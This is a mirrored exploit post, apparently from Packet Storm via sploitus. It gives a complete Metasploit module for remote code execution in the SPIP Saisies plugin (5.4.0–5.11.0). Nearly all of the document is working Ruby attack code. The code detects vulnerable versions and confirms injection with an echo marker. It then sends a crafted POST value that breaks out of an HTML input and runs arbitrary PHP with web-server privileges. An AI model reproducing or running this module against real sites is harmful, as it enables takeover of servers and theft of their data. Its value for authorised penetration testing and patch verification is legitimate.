Share
## https://sploitus.com/exploit?id=PACKETSTORM:216075
=============================================================================================================================================
| # Title : SPIP Saisies Plugin 5.4.0 โ 5.11.0 Remote Code Execution Metasploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.spip.net/en_rubrique25.html |
=============================================================================================================================================
[+] Summary : This Metasploit module exploits a PHP code injection vulnerability in the Saisies plugin for SPIP.
The vulnerability allows an attacker to inject and execute arbitrary PHP code through the vulnerable parameter:
_anciennes_valeurs
The module performs:
Passive version detection (header-based check when available)
Active vulnerability verification (controlled echo test)
Remote code execution via crafted POST request
Payload execution using PHP architecture within Metasploit Framework
If successful, the attacker can execute arbitrary commands on the target server with the privileges of the web server process.
[+] POC :
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SPIP Saisies Plugin RCE (CVE-2025-71243)',
'Description' => %q{
Reliable detection and exploitation of a PHP code injection
vulnerability in SPIP Saisies plugin.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [['CVE', '2025-71243']],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-01'
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to vulnerable form', '/spip.php?page=contact']),
OptString.new('PARAM', [true, 'Vulnerable parameter', '_anciennes_valeurs'])
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
if res
hdr = res.headers['Composed-By']
if hdr && hdr =~ /saisies\((\d+(?:\.\d+)+)\)/
version = Gem::Version.new(Regexp.last_match(1))
if version.between?(Gem::Version.new('5.4.0'), Gem::Version.new('5.11.0'))
return CheckCode::Appears("Detected vulnerable Saisies version #{version}")
end
end
end
marker = Rex::Text.rand_text_alpha(12)
output = execute_php("echo '#{marker}';")
return CheckCode::Vulnerable if output&.include?(marker)
CheckCode::Safe
end
def execute_php(code)
start_marker = Rex::Text.rand_text_alpha(8)
end_marker = Rex::Text.rand_text_alpha(8)
wrapped = "echo '#{start_marker}'; #{code}; echo '#{end_marker}';"
injection = "x' ?><?php #{wrapped} ?><input value='x"
uri_path = target_uri.path
query = URI(target_uri.to_s).query
vars_get = query ? Rack::Utils.parse_query(query) : {}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri_path),
'vars_get' => vars_get,
'vars_post' => { datastore['PARAM'] => injection }
})
return nil unless res && res.body
regex = /#{Regexp.escape(start_marker)}(.*?)#{Regexp.escape(end_marker)}/m
match = res.body.match(regex)
match ? match[1].strip : nil
end
def exploit
print_status('Triggering payload...')
result = execute_php(payload.encoded)
if result
print_good("Execution result:\n#{result}")
else
fail_with(Failure::UnexpectedReply, 'Payload executed but no output detected')
end
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================